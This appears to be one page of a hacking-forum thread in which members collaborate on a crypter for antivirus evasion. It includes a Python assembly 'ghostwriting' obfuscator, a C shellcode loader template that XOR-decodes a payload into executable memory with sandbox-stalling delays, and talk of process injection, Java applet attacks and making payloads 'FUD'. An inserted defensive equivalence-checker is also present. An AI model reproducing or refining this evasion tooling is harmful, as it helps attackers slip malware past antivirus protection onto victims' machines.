Page 11 of 12
Results 101 to 110 of 114

Thread: [script] for AV evasion

  1. #101
    Member
    Join Date
    Jan 2010
    Posts
    54

    Default Re: [script] for AV evasion

    Quote Originally Posted by ShadowMaster View Post
    Open a new term
    Type "dos2unix crypter.py && dos2unix javaAttack.sh" in /opt/metasploit/msf3/
    and you're done.
    Yeah, I read that, but I thought it would have already been done to the script :/ confusing, but oh well. Thanks for clearing that up, ShadowMaster.

  2. #102
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    First off, great script. (BTW, if anyone here has any Perl coding skills, I'm writing an ASM ghostwriting automation tool in Perl. Any help would be appreciated. That should help to make FUD payloads.)
    Second off, I get this error on part two. Also, I'm not entirely sure how to integrate part two into a pentest. All this does is set up the site and Java so that when a user browses to my IP from a spoofed DNS response he will be pwned?
    [*] Stripping out the debugging symbols...
    [*] Moving trojan horse to web root...
    **************************************
    1) apache server
    2) java applet attack
    3) create evil PDF
    **************************************
    Select an attack (1-n):2
    Traceback (most recent call last):
    File "./crypter.py", line 137, in <module>
    subprocess.Popen(args=["gnome-terminal", "--command=sh /opt/metasploit/msf3/javaAttack.sh"]).pid
    File "/usr/lib/python2.6/subprocess.py", line 633, in __init__
    errread, errwrite)
    File "/usr/lib/python2.6/subprocess.py", line 1139, in _execute_child
    raise child_exception
    OSError: [Errno 2] No such file or director


    I've been getting this output and trying to debug, but so far I have no idea what's causing it. Do you?
    You're right, part 2 isn't really useful in a pentest. I don't do this as a job. It's just a hobby, so I didn't really think about that.

    As for your error, did you set execution permission for javaAttack.sh, and is it in your metasploit directory?
    If you did and it still isn't working, maybe changing
    Code:
    subprocess.Popen(args=["gnome-terminal", "--command=sh /opt/metasploit/msf3/javaAttack.sh"]).pid
    to
    Code:
    subprocess.call(['sh', 'javaAttack.sh'])
    will work.
    This is a strange error and you are the first one to have it.

    I don't think I will be able to help with your ghostwriting tool, as I don't know much about asm and I haven't really done much in Perl before.
    I'm kind of trying to learn more asm because I find you need it a lot.

    To make my script FUD again I thought to write a C++ program that would call a process in suspended mode and then write the shellcode to the process and resume the process. This is kind of a known method to AVs, so I would need to obfuscate my API calls.

    I also think that encrypting your shellcode on disk and decrypting it in memory is not good enough anymore. AV sandboxes really step through your program step by step until they find something. Ghostwriting asm is probably the best option.

    Also this seems interesting: http://funoverip.net/2012/06/antivir...evasion-part2/

    Any more ideas ?
    Last edited by LHYX1; 07-11-2012 at 05:52 AM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  3. #103
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    So I read that paper, and it was pretty awesome. If you can use that in your script it would be pretty cool. A couple of things. 1) Allow for just compiling and placing of the trojan in root. Do not force the listener to be started. In a pentest with phishing, it is annoying to have to cancel the listener every time, instead of continuing down the custom payload path with your executable.

    2) when I finally finish my ASM GW script, allowing for default payload obfuscation, integration into your script would be very cool. Do not let this stop you from writing your own, I have several py ghostwriting scripts I can give you to help you get started.

    3) My javaAttack.sh is obviously both executable and found in the dir, but even when I change your line to the suggested one it fails with the same error.

    4) Have you looked at using different wrappers for the shellcode? Usually it's the wrapper that is detected and not the sc. See: http://www.mattandreko.com/2012/02/u...bypass-av.html for several cool examples.

    5) Maybe you can have a c/c++ prog inject the shellcode to a running process or something. Again, many methods exist for this.

    6) Have you checked out shellcodeexec? You should. You may find it cool.

    Let me know what you think of all these.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  4. #104
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    1) I tested the method of connecting to 127.0.0.1:445 to check whether your malware is running in a sandbox, and it worked on Avira and some other AVs. Although it doesn't bypass all of them. I know AVs don't like socket APIs, so maybe I'll try to hide them. I'll post the code for this tomorrow. I will allow for just compiling and placing the exe in /root in the next version of the script.

    2) Yes, it would be really cool to integrate the scripts. Also, I would really appreciate it if you would share one of your py GW scripts. I think I could learn a lot from them.

    3) Tomorrow I'll take a deeper look at the error. I'll finally have some time to work on the script.

    4) I'll look into it. Although I don't really like to use C# for this. You would always need a Windows machine to compile.

    5) I'll try some different methods and see which one is the best.

    6) I'll also check it tomorrow.
    Last edited by LHYX1; 07-13-2012 at 05:47 AM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  5. #105
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    Code:
    import random
    import sys
    
    reg32 = ["EAX", "EBX", "ECX", "EDX", "ESP", "EBP", "ESI", "EDI"]
    reg16 = [['AL', 'AH'], ['BL', 'BH'], ['CL', 'CH'], ['DL', 'DH']]
    BitWiseOps = ["And", "Or", "XOr", "Mov"]
    StackOps = ["Push", "Pop"]
    # Sequences equivalent to "XOR {REG}, {REG}"; {DREG} is a random scratch register.
    Xors = [["XOR {DREG}, {DREG}", "MOV {REG}, {DREG}"],
            ["SUB {REG}, {REG}"],
            ["OR {REG}, ffffffffh", "Push {DREG}", "MOV {DREG}, ffffffffh", "SUB {REG}, {DREG}", "Pop {DREG}"],
            ["OR {REG}, ffffffh", "AND {REG}, 55555555h", "AND {REG}, AAAAAAAAh"]]
    # Sequences equivalent to "MOV {REG}, {amount}" for an immediate {amount}.
    Movs = [["OR {REG}, ffffffffh", "AND {REG}, {amount}"], ["XOR {REG}, {REG}", "ADD {REG}, {amount}"]]
    
    def GhostWriter():
        # Rewrite every line of the input listing and save the result under a new name.
        inFile = open(sys.argv[1], 'r')
        fileLines = inFile.read().splitlines()
        inFile.close()
        for i in range(len(fileLines)):
            l = fileLines[i]
            if len(l) < 4:
                print "invalid line, shorter than 4 characters: " + l
            elif l[:2] == "//":
                print "comment line: " + l
            elif l[:3] == 'Pop' or l[:4] == 'Push':
                l = stack(l)
            else:
                l = bitWiseObfuscation(l)
            fileLines[i] = l
    
        newName = sys.argv[1]
        if "." in newName: newName = newName.replace(".", "REMADE.", 1)
        else: newName = newName + "REMADE"
        newFile = open(newName, 'w')
        for l in fileLines: newFile.write(l + "\n")
        newFile.close()
        print "file saved as: " + newName
    
    def bitWiseObfuscation(l):
        # Replace a register-zeroing XOR, or a MOV of an immediate, with a random equivalent.
        cmds = readCommand(l)
        if len(cmds) == 3:
            if cmds[0].upper() == "XOR" and cmds[1].upper() == cmds[2].upper():
                newRegister = getRandomRegister(cmds[1].upper())
                finalCommand = "\n".join(random.choice(Xors))
                finalCommand = finalCommand.replace('{DREG}', newRegister)
                return finalCommand.replace('{REG}', cmds[1].upper())
            elif cmds[0].upper() == "MOV" and cmds[2].upper() not in reg32:
                finalCommand = "\n".join(random.choice(Movs))
                finalCommand = finalCommand.replace('{REG}', cmds[1].upper())
                return finalCommand.replace('{amount}', cmds[2].upper())
        return l
    
    def getRandomRegister(register):
        # Pick a scratch register different from the one being rewritten.
        newRegister = random.choice(reg32)
        while newRegister == register.upper():
            newRegister = random.choice(reg32)
        return newRegister
    
    def stack(command):
        # Push/Pop rewriting is not implemented yet; the line is kept as it is.
        return command
    
    def readCommand(command):
        # Split "OP dst, src" into [OP, dst, src] whatever the spacing around the comma.
        return command.replace(',', ' ').split()
    
    if __name__ == "__main__":
        if len(sys.argv) < 2:
            print "please write a path to a file as the first parameter (after the script name)"
        else:
            GhostWriter()
    This is one technique, albeit not the one I am using for my perl script. I'll ask the author of the second one for permission to post, and if he says yes I will. I look forward to the next version of your script. Edit the first post and provide a link in the next post as well.
    World Domination is such an ugly phrase. I prefer the term World Optimization.
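As an added example (my own code, not LHYX1's or ShadowMaster's), here is the kind of semantic check a detection engineer uses to see through substitutions like the ones in the script above: it runs a sequence over an abstract register state that tracks which bits are known, so byte-different sequences that zero the same register compare equal, and the scratch-register side effect of the first Xors template shows up as well. The instruction syntax is the one the script's tables use; the register-state encoding and the function names are my own.

```python
MASK = 0xFFFFFFFF
REGS = ("EAX", "EBX", "ECX", "EDX", "ESP", "EBP", "ESI", "EDI")
UNKNOWN = (0, 0)  # register state = (value bits, known-bit mask); nothing known here

def known(v):  # a fully known 32-bit constant
    return (v & MASK, MASK)

def operand(tok, regs):  # register -> tracked state; immediate ('ffffffffh', '0x10') -> known
    if tok in REGS:
        return regs[tok]
    return known(int(tok[:-1], 16) if tok.endswith("H") else int(tok, 0))

def apply(op, a, b, same_reg):  # bit-precise transfer functions over (value, known) pairs
    (av, ak), (bv, bk) = a, b
    if op == "MOV":
        return b
    if op in ("XOR", "SUB") and same_reg:  # r ^ r and r - r are 0 whatever r holds
        return known(0)
    if op == "OR":  # a bit is known 1 if either side has it known 1
        ones, zeros = (av & ak) | (bv & bk), (~av & ak) & (~bv & bk)
        return (ones, ones | zeros)
    if op == "AND":  # a bit is known 0 if either side has it known 0
        zeros, ones = (~av & ak) | (~bv & bk), (av & ak) & (bv & bk)
        return (ones, zeros | ones)
    if op == "XOR":
        k = ak & bk
        return ((av ^ bv) & k, k)
    if op in ("ADD", "SUB") and ak == MASK and bk == MASK:  # only fold fully known inputs
        return known(av + bv if op == "ADD" else av - bv)
    return UNKNOWN

def evaluate(asm):  # run a sequence in the ghostwriter's syntax over all-unknown registers
    regs, stack = dict((r, UNKNOWN) for r in REGS), []
    for line in asm.splitlines():
        line = line.split("//")[0].strip().upper()  # '//' marks a comment line in the script's input
        if not line:
            continue
        op, _, rest = line.partition(" ")
        toks = [t.strip() for t in rest.split(",")]
        if op == "PUSH":
            stack.append(operand(toks[0], regs))
        elif op == "POP":
            regs[toks[0]] = stack.pop()
        else:
            regs[toks[0]] = apply(op, regs[toks[0]], operand(toks[1], regs), toks[0] == toks[1])
    return regs

def same_effect(asm_a, asm_b, reg):  # both leave `reg` in the same, fully determined state
    sa, sb = evaluate(asm_a)[reg], evaluate(asm_b)[reg]
    return sa == sb and sa[1] == MASK
```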

  6. #106
    Just burned his ISO
    Join Date
    May 2011
    Posts
    3

    Default Re: [script] for AV evasion

    Nice tool. I've modified the loop values to 105000, but it is still detected by Kaspersky, Avira, F-Secure and BitDefender. Please have a look and update it so it may bypass all of them. I would say to make it dynamic ghostwriting.

    Regards
    Scorpoin

  7. #107
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    As I've been working on ASM ghostwriting for many months now, I can tell you this with some authority: to do anything more complicated than XOR or static string replacement is *HARD*. This is not something that'll happen overnight.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  8. #108
    Just burned his ISO
    Join Date
    May 2011
    Posts
    3

    Default Re: [script] for AV evasion

    Thanks for your prompt response. @Shadow and @LHYX1, could you guys please help me out with what I need to change to avoid this detection, since it is scan-time based, not runtime based, encryption. @LHYX1 I've edited your script structure.c to fulfill my need.

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <windows.h>
    #include <time.h>
    
    int main(){
        char junkA []= %s;
        unsigned char payload[] = %s;
        char junkB []= %s;
        unsigned char key = %s;
        unsigned int PAYLOAD_LENGTH = %s;
        int i;
        unsigned char* exec = (unsigned char*)VirtualAlloc(NULL, PAYLOAD_LENGTH/2 ,0x1000,0x40);
        unsigned char* unpack = (unsigned char*)VirtualAlloc(NULL, PAYLOAD_LENGTH/2, 0x1000,0x40);
        int z, y;
        int devide;
        int x = 0;
        time_t start_time, cur_time;
    
        time(&start_time);
        do
        {
            time(&cur_time);
        }
        while((cur_time - start_time) < 2);
    
        for(i=0; i<PAYLOAD_LENGTH; i++)
        {
            devide = %s
            if(devide == 0)
            {
                unpack[x]=payload[i];
                x++;
            }
        }
    
        for(i=0; i<PAYLOAD_LENGTH/2; i++)
        {
            for(z=0;z<7000;z++)
            {
                for(y=0;y<700;y++)
                {
                    exec[i]=unpack[i]^key;
                }
            }
        }
    
        ((void (*)())exec)();
    
        return 0;
    }
    Please share your valuable thoughts and let me know some guide or something where I can learn more. If possible, let me know whether it is possible to make changes to the current script. I have not made any changes to crypter.py.


    Regards
    scorpoin

  9. #109
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    @LHYX1
    Sorry for the thread hijack, but wanted you to check this out: http://www.backtrack-linux.org/forum...ad.php?t=51129
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  10. #110
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [script] for AV evasion

    @ info:
    if anyone here .. the "mingw32" package is in the DEFAULT install in BT5-R3!
